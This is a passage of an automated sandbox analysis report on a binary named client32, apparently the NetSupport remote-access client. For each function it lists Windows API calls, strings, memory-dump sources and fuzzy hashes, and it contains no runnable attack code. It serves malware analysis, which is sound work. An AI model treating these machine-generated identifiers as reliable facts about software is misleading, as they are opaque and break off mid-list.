                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$CloseHandle$DeleteEnterErrorEventExitLastLeaveMessageObjectProcessSingleWaitwsprintf
                                                        • String ID: ..\ctl32\Refcount.cpp$idata->Q.size () == 0
                                                        • API String ID: 3524385308-424854974
                                                        • Opcode ID: bd65ad0157e7c5f0c241708b226ef3e10c76f8ac0d767ff1d6be5bb52270b901
                                                        • Instruction ID: 5537e226c3ed29ed2631099e1c940a9c2653324e19426985809a76b96a39e417
                                                        • Opcode Fuzzy Hash: bd65ad0157e7c5f0c241708b226ef3e10c76f8ac0d767ff1d6be5bb52270b901
                                                        • Instruction Fuzzy Hash: E8419179D156219FCB44DFA5D8C8A5BF7A4FB0B318B148A7DE82693744D730B400CBA0
                                                        Function 110AB7F0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 101libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(psapi.dll,82E0FB89,?,?,00000000), ref: 110AB834
                                                        • EnumWindows.USER32(110AA9F0,?), ref: 110AB897
                                                        • GetRgnBox.GDI32(?,?), ref: 110AB8B5
                                                        • GdiFlush.GDI32 ref: 110AB8CD
                                                        • DeleteObject.GDI32(?), ref: 110AB8DB
                                                        • FreeLibrary.KERNEL32(?), ref: 110AB8F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$DeleteEnumFlushFreeLoadObjectWindows
                                                        • String ID: Client$IgnoreScrapeApps$psapi.dll
                                                        • API String ID: 2450096840-2589157395
                                                        • Opcode ID: 75bedf2fc8f724d347e8135fc49e05a308359e9aee003c88a1db692aba27b468
                                                        • Instruction ID: bca5b5664efed83dbd9da041e75816698c7097caf9201845a9eb86541f09eb4f
                                                        • Opcode Fuzzy Hash: 75bedf2fc8f724d347e8135fc49e05a308359e9aee003c88a1db692aba27b468
                                                        • Instruction Fuzzy Hash: 1941C2B6D006599FCB10CFE9D884ADEFBB8FB09314F60866AE419A7240D730A944CF60
                                                        Function 11135710 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76librarytimeloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11134460: GetVersionExA.KERNEL32(111DC648,75A38400), ref: 11134490
                                                          • Part of subcall function 11134460: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
                                                          • Part of subcall function 11134460: _memset.LIBCMT ref: 111344ED
                                                          • Part of subcall function 11134460: _strncpy.LIBCMT ref: 111345AF
                                                          • Part of subcall function 11134460: RegCloseKey.KERNEL32(00000000), ref: 111345BF
                                                        • LoadLibraryA.KERNEL32(secur32.dll,82E0FB89,?,?,?), ref: 11135751
                                                        • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 11135769
                                                        • timeGetTime.WINMM(?,?), ref: 1113577C
                                                        • timeGetTime.WINMM(?,?), ref: 11135793
                                                        • GetLastError.KERNEL32(?,?), ref: 11135799
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 111357BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryTimetime$AddressCloseErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                        • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                        • API String ID: 780815626-3523682560
                                                        • Opcode ID: 811087eced48bf1352f6921602963d150d6912d54705ec714e7290c854b1a43f
                                                        • Instruction ID: bfca20c34ba55109964591b9ec2aab8120f7022172a2dbe8792ba9d2971a07f3
                                                        • Opcode Fuzzy Hash: 811087eced48bf1352f6921602963d150d6912d54705ec714e7290c854b1a43f
                                                        • Instruction Fuzzy Hash: CC21A176D00665ABDB119FA8DD88BAFFFB8EB45B25F144125ED15E3244E7309900CBE0
                                                        Function 110CD5C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 110CD5E0
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
                                                          • Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E
                                                        • _memmove.LIBCMT ref: 110CD667
                                                        • _memmove.LIBCMT ref: 110CD68B
                                                        • _memmove.LIBCMT ref: 110CD6C5
                                                        • _memmove.LIBCMT ref: 110CD6E1
                                                        • std::exception::exception.LIBCMT ref: 110CD72B
                                                        • __CxxThrowException@8.LIBCMT ref: 110CD740
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                        • String ID: deque<T> too long
                                                        • API String ID: 827257264-309773918
                                                        • Opcode ID: 53509356ea8bdf0e54952da7c3cb1b9069d41bb1bf0bff1c0fd6a3581a53c676
                                                        • Instruction ID: 6781a1fe05296667d86fcfe15e514985d94196c5d48f867e94dc86382c5f7813
                                                        • Opcode Fuzzy Hash: 53509356ea8bdf0e54952da7c3cb1b9069d41bb1bf0bff1c0fd6a3581a53c676
                                                        • Instruction Fuzzy Hash: 0D51B676E001059BDB44CFA8CC81AAEFBE5AF94614F19C6A9D819D7344EA74FA01CBD0
                                                        Function 110C3200 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(00000000,?), ref: 110C325D
                                                        • BeginDeferWindowPos.USER32(?), ref: 110C327F
                                                        • GetWindowRect.USER32(?,?), ref: 110C32A9
                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110C32D6
                                                        • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000017), ref: 110C3365
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • EndDeferWindowPos.USER32(00000000), ref: 110C3381
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110C3243
                                                        • m_hWnd, xrefs: 110C3248
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$Defer$Rect$BeginErrorExitLastMessagePointsProcesswsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 553022447-1557312927
                                                        • Opcode ID: c001c96da27efb8ecc90982f93b48cea9dc7f9539eb4b79afcd969ba7f90e69b
                                                        • Instruction ID: 7f695be0691b523cdd1d5d21dea229869abac41504e52d19061d8b85fb76dc47
                                                        • Opcode Fuzzy Hash: c001c96da27efb8ecc90982f93b48cea9dc7f9539eb4b79afcd969ba7f90e69b
                                                        • Instruction Fuzzy Hash: 0051D0B6E00609AFCB10CFA9C984A9EFBF5BF88314F148259E855A7744C730B941CFA0
                                                        Function 1110B0D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 111057A0: GetClientRect.USER32(?,?), ref: 111057CA
                                                        • GetWindowRect.USER32(?,?), ref: 1110B100
                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1110B112
                                                        • GetClientRect.USER32(?,?), ref: 1110B120
                                                        • GetScrollRange.USER32(?,00000000,?,?), ref: 1110B161
                                                        • GetSystemMetrics.USER32(00000003), ref: 1110B171
                                                        • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1110B184
                                                        • GetSystemMetrics.USER32(00000002), ref: 1110B18E
                                                        Strings
                                                        • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 1110B1D4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                        • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                        • API String ID: 4172599486-2052393828
                                                        • Opcode ID: 64ddedc56d88887bb4451be383381c356aadea2b9397b7b8a9063e4f72324cbb
                                                        • Instruction ID: 963abaf8dc2dfbd8bd83222bbfeff6eec01238f1e7f741d42411ca3803a77853
                                                        • Opcode Fuzzy Hash: 64ddedc56d88887bb4451be383381c356aadea2b9397b7b8a9063e4f72324cbb
                                                        • Instruction Fuzzy Hash: BA51B0B5E00609AFDB04CFA8D985AEEFBF9FF88314F108529E519A3240D770A941CF64
                                                        Function 11123160 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • GetTickCount.KERNEL32 ref: 111231A0
                                                        • Beep.KERNEL32(00000000,00000000), ref: 11123295
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BeepCountTick__wcstoi64
                                                        • String ID: *SoundWhileViewed$BeepWhileViewed$Client
                                                        • API String ID: 666309045-3409951188
                                                        • Opcode ID: d920f05703bcd11949c8e46f564084d737ad2e5f5d74a240adc2f0c53d488819
                                                        • Instruction ID: 88fc7c2c2ff2b611e8e8a37401301b3f6159e5831b8fa70f0dc415b1a958c5df
                                                        • Opcode Fuzzy Hash: d920f05703bcd11949c8e46f564084d737ad2e5f5d74a240adc2f0c53d488819
                                                        • Instruction Fuzzy Hash: 56417B36A1C6616BD7518A608D84BDFFB298F5B718FB04264EC6897180FF30E941CB51
                                                        Function 11015410 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetPropA.USER32(?,?), ref: 1101547F
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 11015190: BeginPaint.USER32(?,?), ref: 110151BF
                                                          • Part of subcall function 11015190: GetWindowRect.USER32(00000000,?), ref: 110151EC
                                                          • Part of subcall function 11015190: _memset.LIBCMT ref: 110151FA
                                                          • Part of subcall function 11015190: CreateFontIndirectA.GDI32(?), ref: 11015216
                                                          • Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 1101522A
                                                          • Part of subcall function 11015190: SetBkMode.GDI32(00000000,00000001), ref: 11015235
                                                          • Part of subcall function 11015190: BeginPath.GDI32(00000000), ref: 11015242
                                                          • Part of subcall function 11015190: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015260
                                                          • Part of subcall function 11015190: EndPath.GDI32(00000000), ref: 11015267
                                                          • Part of subcall function 11015190: PathToRegion.GDI32(00000000), ref: 1101526E
                                                          • Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015280
                                                          • Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015296
                                                          • Part of subcall function 11015190: CreatePen.GDI32(00000000,00000002,?), ref: 110152B0
                                                          • Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 110152BE
                                                          • Part of subcall function 11015190: SelectObject.GDI32(00000000,?), ref: 110152CE
                                                        • GetPropA.USER32(?), ref: 1101548E
                                                        • wsprintfA.USER32 ref: 110154C3
                                                        • RemovePropA.USER32(?), ref: 110154F8
                                                        • DefWindowProcA.USER32(?,?,?,?), ref: 11015521
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
                                                        • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                        • API String ID: 1924375018-841114059
                                                        • Opcode ID: ec3e1234084b3d82126ba732f157090ad2e44ab0648003b83a7f936b10213f93
                                                        • Instruction ID: 2915d23f9928799d524ed0ec110504297751baa3e875027ded2e10bedea347e8
                                                        • Opcode Fuzzy Hash: ec3e1234084b3d82126ba732f157090ad2e44ab0648003b83a7f936b10213f93
                                                        • Instruction Fuzzy Hash: 9531A976E01125ABDB11CF94DC84FAEB7A8FF4A319F04816AF9069F144EB359940CB61
                                                        Function 1103F210 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 1103F27C
                                                        • _malloc.LIBCMT ref: 1103F29A
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • GetLastError.KERNEL32 ref: 1103F30C
                                                        • _free.LIBCMT ref: 1103F321
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • CLTCONN.CPP, xrefs: 1103F2D9
                                                        • Error %d reading from smartcard device, xrefs: 1103F313
                                                        • transferred == datalen, xrefs: 1103F2DE
                                                        • Read %u bytes from smartcard device, xrefs: 1103F2EF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$AllocateExitHeapMessageProcess_free_mallocwsprintf
                                                        • String ID: CLTCONN.CPP$Error %d reading from smartcard device$Read %u bytes from smartcard device$transferred == datalen
                                                        • API String ID: 492257515-1619960733
                                                        • Opcode ID: 45337b85cd20c82b6ba6e7d5a7b1afb4a068f215ff6c3b5f05ba6ffaf63b7d09
                                                        • Instruction ID: 5c0ce5a60e48b42dacdb937ef0d5d9348949da67155b38d00fc4e8c999954ed4
                                                        • Opcode Fuzzy Hash: 45337b85cd20c82b6ba6e7d5a7b1afb4a068f215ff6c3b5f05ba6ffaf63b7d09
                                                        • Instruction Fuzzy Hash: EA3190B5E0050AAFCB00DF98DC80EAFF7B9FB89714F544559E915A3380E731A9048BA2
                                                        Function 11005170 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemCount.USER32(?), ref: 1100517E
                                                        • _memset.LIBCMT ref: 110051A0
                                                        • GetMenuItemID.USER32(?,00000000), ref: 110051B4
                                                        • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005211
                                                        • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005227
                                                        • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005248
                                                        • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005274
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
